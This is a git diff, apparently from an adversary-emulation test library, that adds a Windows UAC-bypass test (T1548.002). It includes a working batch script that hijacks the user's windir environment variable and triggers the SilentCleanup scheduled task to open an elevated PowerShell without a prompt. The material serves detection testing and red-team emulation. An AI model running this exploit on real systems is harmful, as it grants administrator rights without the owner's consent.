+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+#{file_path}
+```
+
+
+
+
+
+
diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 5186a236..619b5f6a 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -162,3 +162,29 @@ atomic_tests:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
name: command_prompt
elevation_required: true
+- name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: |
+ #{file_path}
+ name: command_prompt
+ elevation_required: false
diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat
new file mode 100644
index 00000000..d873b527
--- /dev/null
+++ b/atomics/T1548.002/src/T1548.002.bat
@@ -0,0 +1,8 @@
+@echo off
+mode 18,1
+color FE
+reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
+timeout /t 2 >nul
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
+timeout /t 3 >nul
+reg delete "HKCU\Environment" /v "windir" /F
\ No newline at end of file
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7d1c8c5d..e78c5f95 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -704,3 +704,7 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
788e0019-a483-45da-bcfe-96353d46820f
58004e22-022c-4c51-b4a8-2b85ac5c596b
0b2f9520-a17a-4671-9dba-3bd034099fff
+28104f8a-4ff1-4582-bcf6-699dce156608
+46f8dbe9-22a5-4770-8513-66119c5be63b
+c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+126f71af-e1c9-405c-94ef-26a47b16c102